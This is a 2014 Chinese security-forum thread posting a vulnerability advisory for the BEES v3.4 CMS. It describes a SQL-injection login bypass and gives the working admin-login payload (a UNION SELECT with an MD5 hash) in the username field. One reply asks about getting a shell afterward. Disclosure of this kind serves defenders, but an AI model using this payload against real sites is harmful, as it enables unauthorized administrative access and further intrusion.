切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
BEES_v3.4_20140409万能密码漏洞[ CodeSec-2014-0009 ][复制链接]
发表于 2014-4-19 18:15:26 | 显示全部楼层 |!read_mode!

开发者漏洞预警 —— BEES_v3.4_20140409万能密码漏洞 [ CodeSec-2014-0009 ]

漏洞编号: CodeSec-2014-0009

漏洞标题: BEES_v3.4_20140409万能密码漏洞

漏洞类型: SQL注入

漏洞危害等级: 中等

漏洞状态: 漏洞发布,联系作者中...

漏洞细节:
见内容

修补方案:
过滤

源码地址:
http://down.chinaz.com/soft/28077.htm

论坛备份源码地址:
http://pan.baidu.com/s/1hquYr32

开发者回复: 暂无

上一帖子:http://www.psacms.com/thread-2548-1-1.html
如上面所说 全局过滤函数不严格导致后台可注入执行万能密码
账户:' UNION SELECT 1,1,MD5(1),1,0 #
密码:1
多谢老大的回复~~~
大家再来一起看看还有什么洞子

已有 1 人评分金币 收起 理由
店小二01 + 100

总评分: 金币 + 100   查看全部评分

发表于 2014-4-23 16:51:55 | 显示全部楼层
不了解 BEES,万能密码登入之后后台是否方便拿shell?
发表于 2014-4-29 13:52:32 | 显示全部楼层
我是新来的,来学习一下

代码区

GMT+8, 2019-11-23 08:01

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部